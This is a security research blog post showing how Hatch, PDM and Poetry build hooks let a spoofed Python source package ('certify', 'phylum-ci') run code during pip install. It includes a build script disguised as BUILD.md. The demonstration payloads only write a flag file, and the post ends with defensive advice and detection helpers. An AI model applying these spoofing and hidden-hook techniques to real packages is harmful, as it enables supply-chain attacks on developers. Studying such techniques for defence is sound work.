Modern Python Build Hooks

Photo by Tengyart / Unsplash
🗣️
This is part of a series of posts examining the methods by which malicious Python code gains execution.

This blog series has already shown that most Python malware gets in because source distributions are allowed when installing packages. We’ve also seen that most of that malware gains execution by running from the setup.py file. That’s old news and more likely to be noticed. Attackers want to be modern, too. Is there a way for them to gain arbitrary code execution with the pyproject.toml file instead? It turns out there is.

Some build backends provide build hooks for modifying the inputs and outputs of source and built distribution creation. Hatch and PDM are two examples of package managers with related build backends that offer build hook functionality. There may be others (see the addendum about Poetry at the end of this post). Hatch provides a popular build backend in hatchling, so we’ll start with it to demonstrate the process.

Spoofing pyproject.toml projects

We’ll start with the same certifi package that has been used throughout this series. To show just how useful Hatch is for package management, the process will be shown from the beginning. The process for spoofing pyproject.toml projects will mimic the one used in the post showing how to do so for setup.py projects.

First, be sure Hatch is installed. I prefer the pipx method. Then, clone the repository for the legitimate certifi package and switch into the new directory:

❯ pipx install hatch
  installed package hatch 1.10.0, installed using Python 3.12.3
  These apps are now globally available
    - hatch
done! ✨ 🌟 ✨

❯ git clone git@github.com:certifi/python-certifi.git python-certify
Cloning into 'python-certify'...
remote: Enumerating objects: 934, done.
remote: Counting objects: 100% (278/278), done.
remote: Compressing objects: 100% (127/127), done.
remote: Total 934 (delta 207), reused 152 (delta 151), pack-reused 656
Receiving objects: 100% (934/934), 1.34 MiB | 668.00 KiB/s, done.
Resolving deltas: 100% (473/473), done.

Install Hatch and clone the certifi repo

Next, use Hatch to initialize the existing project. This is a nice feature since it will automatically convert the old setuptools configuration using setup.py to the modern PEP 518 pyproject.toml format, adhering to PEP 621 to boot!

## Initialize the existing project
❯ hatch --no-interactive new --init
Migrating project metadata from setuptools

## The output indicates a successful migration, but what did it do?
❯ git status --short
?? pyproject.toml

## Okay, it added a `pyproject.toml` file. Is that enough to build now?
❯ hatch build
──────────────── sdist ────────────────
dist/certifi-2024.2.2.tar.gz
──────────────── wheel ────────────────
dist/certifi-2024.2.2-py3-none-any.whl

Use Hatch to convert setup.py metadata to pyproject.toml

That was easy. With a few commands, we created source and built distributions from an automagically generated, standards-compliant pyproject.toml file. However, rebuilding the legitimate package was never the goal. We want to create a spoofed package that doesn’t rely on setup.py to run our bad code. To do that, we need to make some modifications to pyproject.toml. For reference, here is the original that Hatch generated:

[build-system]
requires = ["hatchling"]
build-backend = "hatchling.build"

[project]
name = "certifi"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
license = "MPL-2.0"
requires-python = ">=3.6"
authors = [
    { name = "Kenneth Reitz", email = "me@kennethreitz.com" },
]
classifiers = [
    "Development Status :: 5 - Production/Stable",
    "Intended Audience :: Developers",
    "License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)",
    "Natural Language :: English",
    "Programming Language :: Python",
    "Programming Language :: Python :: 3",
    "Programming Language :: Python :: 3 :: Only",
    "Programming Language :: Python :: 3.6",
    "Programming Language :: Python :: 3.7",
    "Programming Language :: Python :: 3.8",
    "Programming Language :: Python :: 3.9",
    "Programming Language :: Python :: 3.10",
    "Programming Language :: Python :: 3.11",
    "Programming Language :: Python :: 3.12",
]

[project.urls]
Homepage = "https://github.com/certifi/python-certifi"
Source = "https://github.com/certifi/python-certifi"

[tool.hatch.version]
path = "certifi/__init__.py"

[tool.hatch.build.targets.sdist]
include = [
    "/certifi",
]

The pyproject.toml file generated by Hatch

We’ll add it to source control (git add pyproject.toml) so changes will be more obvious. The first change to make is to rename the project from certifi to certify. Hatch’s logic to automatically detect files to be included when building a wheel relies on the project name matching the file structure. Just like in the previous post about package spoofing, we want a fake distribution package while retaining the import package naming structure. To do that, we need to override the default logic and tell Hatch where to find the files. Here are the changes made in pyproject.toml to meet those goals:

❯ git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index 720ffc5..74d720b 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -3,7 +3,7 @@ requires = ["hatchling"]
 build-backend = "hatchling.build"

 [project]
-name = "certifi"
+name = "certify"
 dynamic = ["version"]
 description = "Python package for providing Mozilla's CA Bundle."
 readme = "README.rst"
@@ -40,3 +40,8 @@ path = "certifi/__init__.py"
 include = [
     "/certifi",
 ]
+
+[tool.hatch.build.targets.wheel]
+packages = ["certifi"]

Diff view in pyproject.toml after spoofing changes

These changes are enough to build a spoofed package with both source and built distributions.

❯ hatch build
──────────────── sdist ────────────────
dist/certify-2024.2.2.tar.gz
──────────────── wheel ────────────────
dist/certify-2024.2.2-py3-none-any.whl

Building distributions with Hatch

Notice that the distribution package is now certify. After installation, the import package is still certifi. That’s great, but it doesn’t offer much in the way of new techniques. Sure, Hatch can be used to convert setup.py projects to pyproject.toml ones, but let’s crack some eggs and get messy.
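The same split between distribution and import names is visible in the built wheel itself. Here is a minimal sketch, using only the standard library, that reads a wheel’s distribution name from its PEP 427 filename and lists the top-level import names inside the archive. The helper name and the in-memory demo wheel are illustrative.

```python
import io
import zipfile


def wheel_import_names(filename: str, source) -> tuple[str, set[str]]:
    """Return (distribution name, top-level import names) for a wheel.

    `source` is anything zipfile.ZipFile accepts: a path or a binary file object.
    """
    # PEP 427 wheel filenames begin with "{distribution}-{version}-".
    dist = filename.split("-")[0]
    tops = set()
    with zipfile.ZipFile(source) as zf:
        for member in zf.namelist():
            top = member.split("/")[0]
            # Skip metadata directories; they are not importable packages.
            if top.endswith((".dist-info", ".data")):
                continue
            # Single-module distributions ship "name.py" at the archive root.
            tops.add(top.removesuffix(".py"))
    return dist, tops


# Demo: an in-memory wheel laid out like the spoofed build.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("certifi/__init__.py", "")
    zf.writestr("certifi/cacert.pem", "")
    zf.writestr("certify-2024.2.2.dist-info/METADATA", "Name: certify\n")
buf.seek(0)

dist, tops = wheel_import_names("certify-2024.2.2-py3-none-any.whl", buf)
print(dist, sorted(tops))  # certify ['certifi']
```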

Hatching evil plans

Hatch is very much a modern tool, adhering to the latest packaging standards. It eschews the legacy methods of defining metadata and package configuration in a setup.py file, which is essentially an arbitrary code execution vector. Instead, it adopts pyproject.toml as the PEP 518 compliant plaintext configuration file. There’s no way arbitrary code can run from a config file, right? Right!? You may be asking, “What about my custom package generation steps? How am I supposed to compile extensions for all the various platform types my project supports?”

Hatch has you covered, with build hooks that get around this limitation. These build hooks are offered as plugins, either third-party (i.e., more build requirements) or first-party by adhering to a reference plugin interface. The interface allows for writing code that will be executed at one or more points in the build process:

  • clean: occurs before the build process if the -c/--clean flag was passed to the build command, or when invoking the clean command
  • initialize: occurs immediately before each build
  • finalize: occurs immediately after each build

Additionally, Hatch provides one built-in build hook named custom. It is this hook that will be used to deliver our malicious payload since it requires the least amount of additional code. It is enabled with a single line added to the pyproject.toml configuration:

[tool.hatch.build.targets.wheel.hooks.custom]

The default configuration for this custom build hook specifies hatch_build.py as the file containing the custom implementation of the interface. The file name and/or path can be different but we’ll use the default for this example to avoid adding another line to pyproject.toml. For reference, this is now the full difference in the configuration file as compared to the one initially generated by Hatch:

❯ git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index 720ffc5..889ab73 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -3,7 +3,7 @@ requires = ["hatchling"]
 build-backend = "hatchling.build"

 [project]
-name = "certifi"
+name = "certify"
 dynamic = ["version"]
 description = "Python package for providing Mozilla's CA Bundle."
 readme = "README.rst"
@@ -40,3 +40,12 @@ path = "certifi/__init__.py"
 include = [
     "/certifi",
 ]
+
+# This section is required because the project name
+# was changed and no longer matches the package name.
+[tool.hatch.build.targets.wheel]
+packages = ["certifi"]
+
+# This empty table entry triggers execution of the
+# `hatch_build.py` module when building wheels.
+[tool.hatch.build.targets.wheel.hooks.custom]

Diff view in pyproject.toml after enabling build hooks

Next, we’ll write a minimal plugin implementation using hatch_build.py. We choose to use the initialize entry point since it is more likely to run for every build (the finalize entry point may not be called if the build fails). The “malicious” code simply adds a file to a temporary directory to serve as a flag indicating when the code runs. Real malware would be more complex and likely obfuscated.

from hatchling.builders.hooks.plugin.interface import BuildHookInterface

class CustomBuildHook(BuildHookInterface):
    def initialize(self, version, build_data):
        # Code in this function will run before building
        with open("/private/tmp/flag.txt", mode="w", encoding="utf-8") as f:
            f.write("Malware could have run here")

Build hook with "malware" in hatch_build.py
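A hook file like this can be reviewed without running it. The sketch below parses the module with the standard-library ast module and reports which of the clean, initialize and finalize stages each BuildHookInterface subclass overrides. The function name is hypothetical, and this is a review aid under simple assumptions, not a complete detector.

```python
import ast

HOOK_STAGES = {"clean", "initialize", "finalize"}


def hatch_hook_stages(source: str) -> dict[str, set[str]]:
    """Map each BuildHookInterface subclass to the hook stages it overrides.

    The source is parsed with ast and never imported, so nothing in it runs.
    """
    result = {}
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.ClassDef):
            continue
        # Handles both `BuildHookInterface` and `interface.BuildHookInterface`.
        bases = {
            b.id if isinstance(b, ast.Name) else getattr(b, "attr", None)
            for b in node.bases
        }
        if "BuildHookInterface" in bases:
            result[node.name] = {
                item.name
                for item in node.body
                if isinstance(item, (ast.FunctionDef, ast.AsyncFunctionDef))
                and item.name in HOOK_STAGES
            }
    return result


hook_source = '''
from hatchling.builders.hooks.plugin.interface import BuildHookInterface

class CustomBuildHook(BuildHookInterface):
    def initialize(self, version, build_data):
        pass
'''
print(hatch_hook_stages(hook_source))  # {'CustomBuildHook': {'initialize'}}
```

An empty result does not mean the file is safe. Importing the base class under an alias slips past this check. So does placing code at module level, which Python executes whenever the module is loaded.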

Building the source distribution with this change and using it to install the package shows that the newly added code does indeed run:

## With only two added and modified files...
❯ git status --short
AM pyproject.toml
?? hatch_build.py

## ...we can build a spoofed source distribution that
## contains those files, to be used when building a wheel
❯ hatch build --target sdist
──────────────── sdist ────────────────
dist/certify-2024.2.2.tar.gz

## Create a Python virtual environment
❯ python -m venv .venv

## ...and activate it for demo use
❯ source .venv/bin/activate

## See that there is no flag present
❯ ls -alh /private/tmp/flag.txt
ls: /private/tmp/flag.txt: No such file or directory

## Installing the package does not indicate anything bad happened...
❯ python -m pip install dist/certify-2024.2.2.tar.gz
Processing ./dist/certify-2024.2.2.tar.gz
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Building wheels for collected packages: certify
  Building wheel for certify (pyproject.toml) ... done
  Created wheel for certify: filename=certify-2024.2.2-py3-none-any.whl size=164156 sha256=105c8292d17e6976de036db187899f12c0c28dd7a6cf6a31b03b6a094c718e95
  Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/43/8d/c9/91f4cd154b7df7fbc77d07b6d2012a4f0b9a289da49d46706d
Successfully built certify
Installing collected packages: certify
Successfully installed certify-2024.2.2

## ...but now there is a "flag.txt" file...
❯ ls -alh /private/tmp/flag.txt
-rw-r--r--  1 maxrake  wheel    27B May  2 12:57 /private/tmp/flag.txt

## ...which proves that any arbitrary code can run in "hatch_build.py"
❯ cat /private/tmp/flag.txt
Malware could have run here

Source distribution used to execute payload during wheel build step of package installation

PDM FTW

The same process works when using the build hooks offered by the pdm-backend package that comes from the PDM project. Here is what that looks like, using the same certifi package as a starting point.

## Install PDM (I prefer using pipx)
❯ pipx install pdm
  installed package pdm 2.15.1, installed using Python 3.12.3
  These apps are now globally available
    - pdm
done! ✨ 🌟 ✨

## Clone the legitimate `certifi` package repo and switch into directory
❯ git clone git@github.com:certifi/python-certifi.git python-certify-pdm
Cloning into 'python-certify-pdm'...
remote: Enumerating objects: 971, done.
remote: Counting objects: 100% (314/314), done.
remote: Compressing objects: 100% (143/143), done.
remote: Total 971 (delta 226), reused 196 (delta 171), pack-reused 657
Receiving objects: 100% (971/971), 1.35 MiB | 5.91 MiB/s, done.
Resolving deltas: 100% (492/492), done.

## Use Hatch to migrate from `setup.py` to `pyproject.toml`
❯ hatch --no-interactive new --init
Migrating project metadata from setuptools

## Add the configuration file to source control, for later diffs
❯ git add pyproject.toml

Install PDM and use Hatch to initiate the spoofed project

At this point, the pyproject.toml file looks like the one from before, when Hatch was used. It needs a few adjustments to be used with PDM. For starters, the build backend has to change. Plus, some PEP 621 metadata fields need to be updated to match the expected format even though the content is fine. After those modifications, the pyproject.toml file looks like this:

[build-system]
requires = ["pdm-backend"]
build-backend = "pdm.backend"

[project]
name = "certify"
dynamic = ["version"]
description = "Python package for providing Mozilla's CA Bundle."
readme = "README.rst"
license = { text = "MPL-2.0" }
requires-python = ">=3.6"
authors = [
    { name = "Kenneth Reitz", email = "me@kennethreitz.com" },
]
classifiers = [
    "Development Status :: 5 - Production/Stable",
    "Intended Audience :: Developers",
    "License :: OSI Approved :: Mozilla Public License 2.0 (MPL 2.0)",
    "Natural Language :: English",
    "Programming Language :: Python",
    "Programming Language :: Python :: 3",
    "Programming Language :: Python :: 3 :: Only",
    "Programming Language :: Python :: 3.6",
    "Programming Language :: Python :: 3.7",
    "Programming Language :: Python :: 3.8",
    "Programming Language :: Python :: 3.9",
    "Programming Language :: Python :: 3.10",
    "Programming Language :: Python :: 3.11",
    "Programming Language :: Python :: 3.12",
]

[project.urls]
Homepage = "https://github.com/certifi/python-certifi"
Source = "https://github.com/certifi/python-certifi"

[tool.pdm.version]
source = "file"
path = "certifi/__init__.py"

PDM and project configuration in pyproject.toml

Here is the difference from the one generated by Hatch:

❯ git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index 720ffc5..29302fd 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1,13 +1,13 @@
 [build-system]
-requires = ["hatchling"]
-build-backend = "hatchling.build"
+requires = ["pdm-backend"]
+build-backend = "pdm.backend"

 [project]
-name = "certifi"
+name = "certify"
 dynamic = ["version"]
 description = "Python package for providing Mozilla's CA Bundle."
 readme = "README.rst"
-license = "MPL-2.0"
+license = { text = "MPL-2.0" }
 requires-python = ">=3.6"
 authors = [
     { name = "Kenneth Reitz", email = "me@kennethreitz.com" },
@@ -33,10 +33,6 @@ classifiers = [
 Homepage = "https://github.com/certifi/python-certifi"
 Source = "https://github.com/certifi/python-certifi"

-[tool.hatch.version]
+[tool.pdm.version]
+source = "file"
 path = "certifi/__init__.py"
-
-[tool.hatch.build.targets.sdist]
-include = [
-    "/certifi",
-]

Diff view in pyproject.toml after converting metadata from Hatch to PDM specifications

Enabling PDM build hooks is as easy as creating a pdm_build.py module in the root of the project directory and populating it with one or more of the defined functions from the build hook interface API. The module name can be different but requires an additional entry in the pyproject.toml configuration. This is a minimal pdm_build.py implementation used to plant our flag for wheel builds:

def pdm_build_hook_enabled(context):
    # Only enable for wheel builds
    return context.target == "wheel"

def pdm_build_initialize(context):
    # Code in this function will run before building
    with open("/private/tmp/flag.txt", mode="w", encoding="utf-8") as f:
        f.write("Malware could have run here")

Build hooks with "malware" in pdm_build.py

Building the source distribution with this change and using it to install the package shows that the newly added code does indeed run. The demonstration steps are essentially the same as for Hatch, but this time the virtual environment is created before building the source distribution so PDM will use it instead of creating one.

## There are only two added and modified files
❯ git status --short
AM pyproject.toml
?? pdm_build.py

## Create a Python virtual environment and activate it for use
❯ python -m venv .venv && source .venv/bin/activate

## We can build a spoofed source distribution containing
## the new files, to be used when building a wheel
❯ pdm build --no-wheel --quiet
Building sdist...
INFO: Inside an active virtualenv /Users/maxrake/dev/phylum/python-certify-pdm/.venv, reusing it.
Set env var PDM_IGNORE_ACTIVE_VENV to ignore it.
Built sdist at /Users/maxrake/dev/phylum/python-certify-pdm/dist/certify-2024.2.2.tar.gz

## See that there is no flag present
❯ ls -alh /private/tmp/flag.txt
ls: /private/tmp/flag.txt: No such file or directory

## Installing the package does not indicate anything bad happened...
❯ python -m pip install dist/certify-2024.2.2.tar.gz
Processing ./dist/certify-2024.2.2.tar.gz
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Building wheels for collected packages: certify
  Building wheel for certify (pyproject.toml) ... done
  Created wheel for certify: filename=certify-2024.2.2-py3-none-any.whl size=164138 sha256=c3b6cc5f67b526e88e125f1b806ac3fb9157b93f150c94c7e8f2a9ac7adb214a
  Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/8e/48/d3/1f7efdb8dc7d9332f1d58da9b9ac3e9659c43b286dccde8584
Successfully built certify
Installing collected packages: certify
Successfully installed certify-2024.2.2

## ...but now there is a "flag.txt" file...
❯ ls -alh /private/tmp/flag.txt
-rw-r--r--  1 maxrake  wheel    27B May  6 11:28 /private/tmp/flag.txt

## ...which proves that any arbitrary code can run in "pdm_build.py"
❯ cat /private/tmp/flag.txt
Malware could have run here

Source distribution used to execute payload during wheel build step of package installation

Modern hard hats and safety goggles

Once again, it has been shown that allowing source distributions to be installed anywhere in the fully resolved dependency chain introduces risk. The risk of executing arbitrary code contained within one of those source distributions is not limited to legacy setup.py structures. Modern package managers like Hatch and PDM allow for build hooks in modern pyproject.toml projects. Installing a source distribution means building the wheel that is ultimately installed, which means the hook code in hatch_build.py, pdm_build.py, or any custom-configured module will run.

If possible, disallow all source distributions during install. The pip documentation provides a guide for secure installs that recommends passing --only-binary :all: to meet that goal. Poetry appears to allow configurations that disallow binaries (i.e., wheels), but no equivalent option exists for disallowing source distributions. Other package installers likely suffer the same limitation.
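For scripted installs, the recommended flag can be baked into a small helper so that no call site forgets it. This is a minimal sketch with a hypothetical function name. pip should then refuse to build any sdist and fail when no wheel is available. pip also reads options from PIP_-prefixed environment variables, so setting PIP_ONLY_BINARY=:all: should have the same effect across a whole CI job.

```python
import sys


def binary_only_install_cmd(*requirements: str) -> list[str]:
    """Build a pip command that accepts wheels only.

    --only-binary :all: tells pip not to use source distributions for any
    package, so no build backend (and no build hook) should be invoked.
    """
    return [sys.executable, "-m", "pip", "install", "--only-binary", ":all:", *requirements]


cmd = binary_only_install_cmd("certifi")
print(cmd[3:])  # ['install', '--only-binary', ':all:', 'certifi']
# To run it for real: subprocess.run(cmd, check=True)
```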

One countermeasure to this class of attack is to run all package installation actions through an application sandbox. A sandbox restricts the available actions to only those filesystem and network operations deemed legitimate, effectively neutering malicious code. Phylum offers this protection in the form of the open-source Birdcage sandbox, which is baked into the Phylum CLI and available to Python developers using pip or Poetry through the matching official extensions.

Addendum: Undocumented Poetry build hooks

ℹ️
Since the feature is undocumented and likely to change at any time, this proof of concept is included only as an addendum.

It is indeed possible to include build hooks with Poetry using either the legacy poetry build backend or the modern poetry-core one. This is an undocumented feature but has existed since the earliest days of the project. For some background and insights about the inner workings of this feature, reference these GitHub issues from the Poetry project:

  • The eleventh issue ever, first talking about this feature
  • An issue requesting the feature to be stabilized and documented
  • An issue showing an alternate configuration for the newer poetry-core build backend

To demonstrate the use of Poetry for malicious purposes, we alter our very own phylum project and spoof it as phylum-ci, but with an added Python module disguised as a Markdown file.

## Start from a clone of the `phylum` package repo (hosted as `phylum-ci`)
❯ git remote -v
origin	git@github.com:phylum-dev/phylum-ci.git (fetch)
origin	git@github.com:phylum-dev/phylum-ci.git (push)

## See that only two files need to be modified/added
❯ git status --short
 M pyproject.toml
?? BUILD.md

## Spoof the package by changing the name to `phylum-ci`
## and activate a build hook by specifying a `build` file
❯ git diff pyproject.toml
diff --git a/pyproject.toml b/pyproject.toml
index ca0326a..6cfb131 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -5,8 +5,9 @@ requires = ["poetry-core>=1.8.1"]
 build-backend = "poetry.core.masonry.api"

 [tool.poetry]
-name = "phylum"
+name = "phylum-ci"
 version = "0.44.0"
+build = "BUILD.md"
 description = "Utilities for integrating Phylum into CI pipelines (and beyond)"
 license = "GPL-3.0-or-later"
 authors = ["Phylum, Inc. <engineering@phylum.io>"]

## The build file can be named anything! We seek to blend in here.
## It still needs to contain Python code and a `build()` function.
❯ cat BUILD.md
def build():
    with open("/private/tmp/flag.txt", mode="w", encoding="utf-8") as f:
        f.write("Malware could have run here")

if __name__ == "__main__":
    build()

## Build the source distribution
❯ poetry build --format=sdist
Preparing build environment with build-system requirements poetry-core>=1.8.1
Building phylum-ci (0.44.0)
  - Building sdist
  - Built phylum_ci-0.44.0.tar.gz

## Create a virtual environment and activate it
❯ python -m venv delme_venv && source delme_venv/bin/activate

## Ensure the pip package cache is empty
❯ python -m pip cache purge
Files removed: 3

## Show that there is no flag present
❯ ls -alh /private/tmp/flag.txt
ls: /private/tmp/flag.txt: No such file or directory

## Install the spoofed package
❯ python -m pip install dist/phylum_ci-0.44.0.tar.gz
Processing ./dist/phylum_ci-0.44.0.tar.gz
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Preparing metadata (pyproject.toml) ... done
Collecting cryptography (from phylum-ci==0.44.0)
  Downloading cryptography-42.0.7-cp39-abi3-macosx_10_12_universal2.whl.metadata (5.3 kB)
---TRIMMED-FOR-BREVITY---
Building wheels for collected packages: phylum-ci
  Building wheel for phylum-ci (pyproject.toml) ... done
  Created wheel for phylum-ci: filename=phylum_ci-0.44.0-cp312-cp312-macosx_14_0_arm64.whl size=85083 sha256=8988365340f735e504d06a713cf79e7d5c17c3fe431d15553306246202559aa4
  Stored in directory: /Users/maxrake/Library/Caches/pip/wheels/47/cb/ad/69829b41685d144709dd92559c13e18e25d141402d0b40573d
Successfully built phylum-ci
Installing collected packages: urllib3, ruamel.yaml.clib, pygments, pycparser, packaging, mdurl, idna, charset-normalizer, certifi, ruamel.yaml, requests, markdown-it-py, cffi, rich, cryptography, phylum-ci
Successfully installed certifi-2024.2.2 cffi-1.16.0 charset-normalizer-3.3.2 cryptography-42.0.7 idna-3.7 markdown-it-py-3.0.0 mdurl-0.1.2 packaging-24.0 phylum-ci-0.44.0 pycparser-2.22 pygments-2.18.0 requests-2.31.0 rich-13.7.1 ruamel.yaml-0.18.6 ruamel.yaml.clib-0.2.8 urllib3-2.2.1

## See that the flag has been planted...
❯ ls -alh /private/tmp/flag.txt
-rw-r--r--  1 maxrake  wheel    27B May  8 15:33 /private/tmp/flag.txt

## ...proving that arbitrary code execution is possible.
❯ cat /private/tmp/flag.txt
Malware could have run here

Executing arbitrary code disguised as a Markdown file by using Poetry build hooks
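Since the build script can carry any extension, a name-based check would miss BUILD.md entirely. One heuristic is to flag non-.py files that parse as valid Python and define a top-level build() function, the shape this demonstration relied on. The sketch below implements that heuristic with the standard-library ast module. The function name is hypothetical, and an attacker can evade the check, so treat a hit as a reason to look closer.

```python
import ast
from pathlib import PurePosixPath


def looks_like_disguised_build_script(filename: str, text: str) -> bool:
    """Heuristic: a non-.py file that parses as Python and defines build()."""
    if PurePosixPath(filename).suffix == ".py":
        return False
    try:
        tree = ast.parse(text)  # parse only; nothing is executed
    except SyntaxError:
        return False  # ordinary Markdown prose is almost never valid Python
    return any(
        isinstance(node, ast.FunctionDef) and node.name == "build"
        for node in tree.body
    )


build_md = '''def build():
    pass

if __name__ == "__main__":
    build()
'''
readme_md = "# Build\n\nRun `make` to build the project.\n"
print(looks_like_disguised_build_script("BUILD.md", build_md))  # True
print(looks_like_disguised_build_script("README.md", readme_md))  # False
```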

Charles Coggins

Senior Software Engineer, responsible for integrations and author of the "phylum" Python package. Documentation and quality champion, runner, baseball and scout dad, pod-faster, and lover of outdoors.